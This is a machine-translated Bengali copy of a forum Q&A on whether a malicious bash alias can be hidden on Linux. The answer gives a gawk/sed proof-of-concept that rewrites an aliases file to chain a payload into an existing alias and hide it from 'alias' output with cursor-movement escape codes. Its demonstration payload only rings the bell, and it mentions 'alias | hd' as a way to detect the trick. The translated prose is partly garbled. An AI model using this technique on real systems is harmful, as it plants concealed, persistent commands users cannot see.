লিনাক্সে বাশে কোনও দূষিত উরফ লুকানো সম্ভব?


9

কোনও লিনাক্স সিস্টেমে বাশে কোনও দূষিত ওরফে অস্তিত্ব লুকিয়ে রাখা এবং ব্যবহারকারীর দ্বারা তাদের অজান্তেই এটি কার্যকর করা সম্ভব?

উত্তর:


13

aliasকমান্ডটি যদি ওরফে সংজ্ঞা প্রদর্শন করতে ব্যবহৃত হয় তবে এটি দূষিতর মধ্যে বিদ্যমান উপনামটি সংযুক্ত করে এবং এটি লুকানোর জন্য কার্সার আন্দোলন ব্যবহার করে এটি করা সম্ভব । এটি একটি নিখুঁত বুদ্ধিমান পদ্ধতি নয়, তবে এটি কিছু সময়ের জন্য সনাক্ত করা যেতে পারে। বংশীধ্বনিতুল্য aliasমাধ্যমে hdকোন পালাবার ক্রম (কার্সার আন্দোলন) আপনার alias লেখা আছে কিনা তা আপনাকে দেখাবে। এখানে কীভাবে কোনও দূষিত কমান্ড একটি aliasুকতে পারে তার ধারণার প্রমাণ এখানে রয়েছে:

alias | gawk 'BEGIN {
        FS = "[ =\047]"
        db = "\\"; sp = db " "; amp = db "&"
        sq= "\047"; bell = "\007"; esc = "\033"
    } 
    NR == 3 { len1 = length($2) }
    NR == 4 {
        alias = $2
        orig = gensub(sq, "", "g", substr($0, match($0, "=") + 1))
        orig = gensub(" ", db sp, "g", orig)
    }
    END {
        hide = "$" db sq sp "--" sp db "\r" esc "[J" esc "[A" db "\t"
        for(i=1; i<len1; i++) {hide = hide esc "[C"}
        cmd = "sed -i s/^alias" sp alias ".*/alias" sp alias "=" db sq "echo" sp db bell db db amp db db amp orig db sq hide db sq "/ aliases"
    system(cmd)
    }'
  • sedকমান্ড মডিফাই একটি ফাইল জায়গায় "alias লেখা" বলা - এই ধরনের একটি বাস্তব স্ক্রিপ্ট গলা জন্য যান এবং তাই দূষিত ওরফে পরের বার মৃত্যুদন্ড কার্যকর হচ্ছে সক্রিয় করা হবে একটি বাস্তব স্ক্রিপ্ট ফাইল পরিবর্তন করবে।
  • এই উদাহরণটির দূষিত অংশটি কেবলমাত্র টার্মিনাল বেল বাজায় যাতে আপনি জানেন যে এটি কাজ করছে।
  • মূলত অ্যালাইজড কমান্ডটি hideএকটি আর্গুমেন্টের বিষয়বস্তু দিয়ে কার্যকর করা হবে সুতরাং এটি অনুমেয় যে এই প্রশ্নে উল্লিখিত অনুরূপ একটি ত্রুটি পেতে পারে । এটি প্রভাবিত করার জন্য মূল এবং দূষিত অংশগুলি বিপরীত করা সম্ভব হতে পারে, যদিও এটির সাথে যুক্ত হওয়া যুক্তিগুলিতে হস্তক্ষেপ হবে। উপরের স্ক্রিপ্টে যুক্তিগুলির শেষ চিহ্নিত করার চেষ্টা করা হয়েছে --
  • মূল এবং দূষিত অংশগুলি এর সাথে শৃঙ্খলাবদ্ধ না করে &&আপনি একের পরের অংশে পাইপ করতে পারবেন এবং দূষিত স্ক্রিপ্টটিকে (উপরে সরল echoকমান্ড দ্বারা উপস্থাপিত ) ফাংশনটিকে পাসের মাধ্যমে দিয়ে stdinযেতে stdoutহবে যাতে তথ্যটি অতিক্রম করে যাচ্ছেন বা এটির আড়াল করা যায় অন্যান্য পুনঃনির্দেশে হস্তক্ষেপ না করে অস্তিত্ব আরও
  • এর পরিবর্তে অন্য সম্ভাবনাটি হ'ল দূষিত স্ক্রিপ্টের ভিতরে আসল উপন্যাস অন্তর্ভুক্ত করা যেতে পারে যা কার্সার মুভমেন্ট স্ট্রিংটিকে আর্গুমেন্ট তালিকা থেকে মুছে ফেলতে পারে এবং বাকী অংশটি মূলটিতে পাস করতে পারে।
  • আমি নির্বিচারে 3 এবং 4 রেকর্ডগুলি বেছে নিয়েছি, আরও বুদ্ধিমান কোড নির্দিষ্ট উপাত্তগুলি লক্ষ্য করতে পারে তবে তাদের সংলগ্ন হওয়া দরকার (বা কার্সার আন্দোলন আরও জটিল করা যেতে পারে)।
  • hideস্ট্রিং তাই বিভিন্ন কার্সার আন্দোলন এবং মূল ওরফে টেক্সট অন্তর্ভুক্ত করা পরিবর্তিত হতে পারে aliasকমান্ড দূষিত অংশ সহ এটা গোপন পরিবর্তে অপরিবর্তিত ওরফে দেখানোর জন্য প্রদর্শিত হবে।
  • এটি লিখিত হিসাবে চেষ্টা করার জন্য আপনার কমপক্ষে চারটি সক্রিয় অ্যালিয়াস থাকা দরকার, এই স্ক্রিপ্টটি চালনা করুন, তারপরে ফলাফল ফাইলটি উত্স করুন . aliases। তারপরে আপনি আক্রান্ত উরফটি ব্যবহার করার চেষ্টা করতে পারেন এবং আপনি যখন করেন তখন কেমন লাগে তা দেখতে পারেন alias|hd
  • এটি নিঃসন্দেহে একশো আলাদা উপায়ে আবারও লেখা যেতে পারে - আরও ভাল।
  • এই ধরণের হুমকি কতটা বাস্তবসম্মত? আমার কোন ক্লু নেই। তবে আমি যদি এটা করতে পারি ...
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.